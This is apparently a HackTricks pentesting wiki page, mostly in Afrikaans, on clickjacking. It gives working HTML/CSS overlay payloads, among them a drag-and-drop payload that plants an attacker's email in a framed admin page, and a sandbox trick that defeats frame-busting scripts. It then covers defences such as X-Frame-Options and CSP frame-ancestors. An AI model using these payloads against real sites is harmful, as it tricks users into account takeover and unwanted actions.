Clickjacking

Reading time: 9 minutes

tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

Kyk na die subskripsie planne!
Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Wat is Clickjacking

In 'n clickjacking-aanval word 'n gebruiker mislei om 'n element op 'n webblad te klik wat óf onsigbaar is óf as 'n ander element vermom is. Hierdie manipulasie kan lei tot onbedoelde gevolge vir die gebruiker, soos die aflaai van malware, omleiding na kwaadwillige webbladsye, die verskaffing van credentials of sensitiewe inligting, geldoorplasings, of die aanlyn aankoop van produkte.

Prepopulate forms trick

Dit is soms moontlik om die waardes van velde van 'n vorm te voorinvul met GET-parameters wanneer 'n bladsy gelaai word. 'n aanvaller kan hierdie gedrag misbruik om 'n vorm met arbitrêre data te vul en die clickjacking payload te stuur sodat die gebruiker die knoppie Submit druk.

Populate form with Drag&Drop

As jy die gebruiker nodig het om 'n vorm in te vul maar jy wil hom nie direk vra om spesifieke inligting te skryf nie (soos die e-pos en/of spesifieke wagwoord wat jy ken), kan jy hom net vra om iets te Drag&Drop wat jou beheerste data sal invoer, soos in this example.

Basiese Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 700px;
opacity: 0.1;
z-index: 2;
}
div {
position:absolute;
top:470px;
left:60px;
z-index: 1;
}
</style>
<div>Click me</div>
<iframe src="https://vulnerable.com/email?email=asd@asd.asd"></iframe>

Meertraps Payload

css

<style>
iframe {
position:relative;
width: 500px;
height: 500px;
opacity: 0.1;
z-index: 2;
}
.firstClick, .secondClick {
position:absolute;
top:330px;
left:60px;
z-index: 1;
}
.secondClick {
left:210px;
}
</style>
<div class="firstClick">Click me first</div>
<div class="secondClick">Click me next</div>
<iframe src="https://vulnerable.net/account"></iframe>

Drag&Drop + Click payload

css

<html>
<head>
<style>
#payload{
position: absolute;
top: 20px;
}
iframe{
width: 1000px;
height: 675px;
border: none;
}
.xss{
position: fixed;
background: #F00;
}
</style>
</head>
<body>
<div style="height: 26px;width: 250px;left: 41.5%;top: 340px;" class="xss">.</div>
<div style="height: 26px;width: 50px;left: 32%;top: 327px;background: #F8F;" class="xss">1. Click and press delete button</div>
<div style="height: 30px;width: 50px;left: 60%;bottom: 40px;background: #F5F;" class="xss">3.Click me</div>
<iframe sandbox="allow-modals allow-popups allow-forms allow-same-origin allow-scripts" style="opacity:0.3"src="https://target.com/panel/administration/profile/"></iframe>
<div id="payload" draggable="true" ondragstart="event.dataTransfer.setData('text/plain', 'attacker@gmail.com')"><h3>2.DRAG ME TO THE RED BOX</h3></div>
</body>
</html>

XSS + Clickjacking

As jy 'n XSS attack that requires a user to click op 'n element geïdentifiseer het om die XSS te trigger en die bladsy is vulnerable to clickjacking, kan jy dit misbruik om die gebruiker te mislei om op die knoppie/skakel te klik.
Example:
Jy het 'n self XSS gevind in sekere privaat rekeningbesonderhede (besonderhede wat slegs jy kan set and read). Die bladsy met die form om hierdie besonderhede te stel is vatbaar vir Clickjacking en jy kan die form prepopulate met die GET-parameters.
'n Aanvaller kan 'n Clickjacking attack teen daardie bladsy voorberei deur die form te prepopulate met die XSS payload en die user te tricking om die Submit die form. Dus, when the form is submitted en die waardes is gewysig, sal die user will execute the XSS.

DoubleClickjacking

Eerstens explained in this post, hierdie tegniek vra die slagoffer om twee keer (dubbelklik) op 'n knoppie van 'n pasgemaakte bladsy te klik wat op 'n spesifieke plek geplaas is, en gebruik die tydsverskille tussen die mousedown en onclick events om die slagofferbladsy tydens die dubbelklik te laai sodat die slagoffer eintlik 'n legitieme knoppie op die slagofferbladsy klik.

'n Voorbeeld is te sien in hierdie video: https://www.youtube.com/watch?v=4rGvRRMrD18

'n Code voorbeeld kan gevind word op this page.

warning

Hierdie tegniek laat toe om die gebruiker te mislei om op een plek op die slagofferbladsy te klik en sodoende alle beskerming teen clickjacking te omseil. Dus moet die aanvaller sensitiewe aksies vind wat met net 1 klik uitgevoer kan word, soos OAuth prompts accepting permissions.

Browser extensions: DOM-based autofill clickjacking

Afgesien van iframing van slagofferbladsye, kan aanvallers browser extension UI-elemente teiken wat in die bladsy ingespuit word. Password managers render autofill dropdowns naby gefokusde inputs; deur 'n attacker-controlled veld te fokus en die extension se dropdown te verberg/occlude (opacity/overlay/top-layer truuks), kan 'n gedwonge gebruikersklik 'n gestoor item kies en sensitiewe data in attacker-controlled inputs invul. Hierdie variant benodig geen iframe exposure nie en werk volledig via DOM/CSS-manipulasie.

For concrete techniques and PoCs see:

BrowExt - ClickJacking

Strategieë om Clickjacking te Verminder

Kliëntkant-verdeding

Skripte wat aan die kliëntkant uitgevoer word kan aksies doen om Clickjacking te voorkom:

Verseker dat die aansoekvenster die hoof- of boonste venster is.
Maak alle frames sigbaar.
Voorkom klikke op onsigbare frames.
Ontdek en waarsku gebruikers oor potensiële Clickjacking-pogings.

Echter, hierdie frame-busting skripte kan omseil word:

Browsers' Security Settings: Sommige browsers kan hierdie skripte blokkeer gebaseer op hul sekuriteitsinstellings of gebrek aan JavaScript support.
HTML5 iframe sandbox Attribute: 'n Aanvaller kan frame buster skripte neutraliseer deur die sandbox attribute te stel met allow-forms of allow-scripts waardes sonder allow-top-navigation. Dit verhoed dat die iframe kan verifieer of dit die top-venster is, bv.,

html

<iframe
id="victim_website"
src="https://victim-website.com"
sandbox="allow-forms allow-scripts"></iframe>

Die allow-forms en allow-scripts waardes stel aksies binne die in staat terwyl topvlak-navigasie gedeaktiveer word. Om die beoogde funksionaliteit van die geteikende site te verseker, mag bykomende toestemmings soos allow-same-origin en allow-modals nodig wees, afhangende van die tipe aanval. Blaaier se konsole-boodskappe kan aandui watter toestemmings toegelaat moet word.</p> <h3 id="bediener-kant-verdedigings"><a class="header" href="#bediener-kant-verdedigings">Bediener-kant Verdedigings</a></h3> <h4 id="x-frame-options"><a class="header" href="#x-frame-options">X-Frame-Options</a></h4> <p>Die <strong>X-Frame-Options HTTP response header</strong> vertel blaaiers of dit regverdig is om 'n bladsy in 'n <frame> of <iframe> te render, en help om Clickjacking te voorkom:</p> <ul> <li>X-Frame-Options: deny - Geen domein kan die inhoud in 'n raam plaas.</li> <li>X-Frame-Options: sameorigin - Slegs die huidige webwerf kan die inhoud framen.</li> <li>X-Frame-Options: allow-from https://trusted.com - Slegs die gespesifiseerde 'uri' kan die bladsy framen.</li> <li>Let op die beperkings: as die blaaier hierdie direktef nie ondersteun nie, mag dit nie werk nie. Sommige blaaiers verkies die CSP frame-ancestors direktief.</li> </ul> <h4 id="content-security-policy-csp-frame-ancestors-directive"><a class="header" href="#content-security-policy-csp-frame-ancestors-directive">Content Security Policy (CSP) frame-ancestors directive</a></h4> <p><strong>frame-ancestors directive in CSP</strong> is die aanbevole metode vir Clickjacking-beskerming:</p> <ul> <li>frame-ancestors 'none' - Soortgelyk aan X-Frame-Options: deny.</li> <li>frame-ancestors 'self' - Soortgelyk aan X-Frame-Options: sameorigin.</li> <li>frame-ancestors trusted.com - Soortgelyk aan X-Frame-Options: allow-from.</li> </ul> <p>Byvoorbeeld, die volgende CSP laat slegs framing vanaf dieselfde domein toe:</p> <p>Content-Security-Policy: frame-ancestors 'self';</p> <p>Further details and complex examples can be found in the <a href="https://w3c.github.io/webappsec-csp/document/#directive-frame-ancestors">frame-ancestors CSP documentation</a> and <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/frame-ancestors">Mozilla's CSP frame-ancestors documentation</a>.</p> <h3 id="content-security-policy-csp-with-child-src-and-frame-src"><a class="header" href="#content-security-policy-csp-with-child-src-and-frame-src">Content Security Policy (CSP) with child-src and frame-src</a></h3> <p><strong>Content Security Policy (CSP)</strong> is 'n sekuriteitsmaatreël wat help om Clickjacking en ander code injection attacks te voorkom deur te spesifiseer watter bronne die blaaier mag toelaat om inhoud te laai.</p> <h4 id="frame-src-directive"><a class="header" href="#frame-src-directive">frame-src Directive</a></h4> <ul> <li>Defines valid sources for frames.</li> <li>More specific than the default-src directive.</li> </ul> <pre><code>Content-Security-Policy: frame-src 'self' https://trusted-website.com; </code></pre> <p>Hierdie beleid laat frames toe vanaf dieselfde oorsprong (self) en https://trusted-website.com.</p> <h4 id="child-src-direktief"><a class="header" href="#child-src-direktief">child-src Direktief</a></h4> <ul> <li>Ingevoer in CSP vlak 2 om geldige bronne vir web workers en frames te stel.</li> <li>Dien as fallback vir frame-src en worker-src.</li> </ul> <pre><code>Content-Security-Policy: child-src 'self' https://trusted-website.com; </code></pre> <p>Hierdie beleid laat frames en workers toe van dieselfde oorsprong (self) en https://trusted-website.com.</p> <p><strong>Gebruiksnotas:</strong></p> <ul> <li>Veroudering: child-src word uitgefaseer ten gunste van frame-src en worker-src.</li> <li>Terugvalgedrag: As frame-src afwesig is, word child-src as 'n terugval vir frames gebruik. As albei afwesig is, word default-src gebruik.</li> <li>Streng brondefinisie: Sluit slegs betroubare bronne in die direktiewe in om uitbuiting te voorkom.</li> </ul> <h4 id="javascript-frame-breaking-scripts"><a class="header" href="#javascript-frame-breaking-scripts">JavaScript Frame-Breaking Scripts</a></h4> <p>Hoewel dit nie heeltemal onfeilbaar is nie, kan JavaScript-based frame-busting scripts gebruik word om te verhoed dat 'n webbladsy in 'n raam geplaas word. Voorbeeld:</p> <div class="codeblock_filename_container"><span class="codeblock_filename_inner hljs">javascript</span></div> <pre><code class="language-javascript">if (top !== self) { top.location = self.location } </code></pre> <h4 id="gebruik-van-anti-csrf-tokens"><a class="header" href="#gebruik-van-anti-csrf-tokens">Gebruik van Anti-CSRF Tokens</a></h4> <ul> <li><strong>Token Validation:</strong> Gebruik anti-CSRF tokens in webtoepassings om te verseker dat versoeke wat die toestand verander doelbewus deur die gebruiker gemaak word en nie deur 'n Clickjacked bladsy nie.</li> </ul> <h2 id="verwysings"><a class="header" href="#verwysings">Verwysings</a></h2> <ul> <li><a href="https://portswigger.net/web-security/clickjacking"><strong>https://portswigger.net/web-security/clickjacking</strong></a></li> <li><a href="https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html"><strong>https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html</strong></a></li> <li><a href="https://marektoth.com/blog/dom-based-extension-clickjacking/">DOM-based Extension Clickjacking (marektoth.com)</a></li> </ul> <div class="mdbook-alerts mdbook-alerts-tip"> <p class="mdbook-alerts-title"> <span class="mdbook-alerts-icon"></span> tip </p> <p>Leer en oefen AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/arte"><strong>HackTricks Training AWS Red Team Expert (ARTE)</strong></a><img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><br /> Leer en oefen GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/grte"><strong>HackTricks Training GCP Red Team Expert (GRTE)</strong></a><img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"> Leer en oefen Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"><a href="https://training.hacktricks.xyz/courses/azrte"><strong>HackTricks Training Azure Red Team Expert (AzRTE)</strong></a><img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;"></p> <details> <summary>Ondersteun HackTricks</summary> <ul> <li>Kyk na die <a href="https://github.com/sponsors/carlospolop"><strong>subskripsie planne</strong></a>!</li> <li><strong>Sluit aan by die</strong> 💬 <a href="https://discord.gg/hRep4RUj7f"><strong>Discord groep</strong></a> of die <a href="https://t.me/peass"><strong>telegram groep</strong></a> of <strong>volg</strong> ons op <strong>Twitter</strong> 🐦 <a href="https://twitter.com/hacktricks_live"><strong>@hacktricks_live</strong></a><strong>.</strong></li> <li><strong>Deel hacking truuks deur PRs in te dien na die</strong> <a href="https://github.com/carlospolop/hacktricks"><strong>HackTricks</strong></a> en <a href="https://github.com/carlospolop/hacktricks-cloud"><strong>HackTricks Cloud</strong></a> github repos.</li> </ul> </details> </div> </main> <nav class="nav-wrapper" aria-label="Page navigation">  <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="mobile-nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="mobile-nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <i class="fa fa-angle-right"></i> </a> <div style="clear: both"></div> </nav> <nav class="nav-wide-wrapper" aria-label="Page navigation"> <a rel="prev" href="../pentesting-web/cache-deception/cache-poisoning-to-dos.html" class="nav-chapters previous" title="Previous chapter" aria-label="Previous chapter" aria-keyshortcuts="Left"> <i class="fa fa-angle-left"></i><span style="font-size: medium; align-self: center; margin-left: 10px;">Cache Poisoning to DoS</span> </a> <a rel="next prefetch" href="../pentesting-web/client-side-template-injection-csti.html" class="nav-chapters next" title="Next chapter" aria-label="Next chapter" aria-keyshortcuts="Right"> <span style="font-size: medium; align-self: center; margin-right: 10px;">Client Side Template Injection (CSTI)</span><i class="fa fa-angle-right"></i> </a> </nav> </div> <div class="sidetoc"> <div class="sidetoc-wrapper"> <nav class="pagetoc"></nav> <a class="sidesponsor" href="" target="_blank"> <img src="" alt="" srcset=""> <div class="sponsor-title"> </div> <div class="sponsor-description"> </div> <div class="sponsor-cta"></div> </a> </div> </div> </div> <div class="footer"> <div id="theme-wrapper" class="theme-wrapper"> <div id="theme-btns" class="theme-btns"> <button id="hacktricks-light" type="button" role="radio" aria-label="Switch to light theme" aria-checked="false" class="theme"> <i class="fa fa-sun-o"></i> </button> <button id="hacktricks-dark" type="button" role="radio" aria-label="Switch to dark theme" aria-checked="false" class="theme theme-selected"> <i class="fa fa-moon-o"></i> </button> </div> </div> </div> </div> </div> <script> window.playground_copyable = true; </script> <script src="../elasticlunr.min.js"></script> <script src="../mark.min.js"></script>  <script src="../clipboard.min.js"></script> <script src="../highlight.js"></script> <script src="../book.js"></script>  <script src="../theme/pagetoc.js"></script> <script src="../theme/tabs.js"></script> <script src="../theme/ht_searcher.js"></script> <script src="../theme/sponsor.js"></script> <script src="../theme/ai.js"></script>  <script defer src="https://www.fairanalytics.de/pixel/deXeO7BNBrMuhdG1"></script> </div> </body> </html>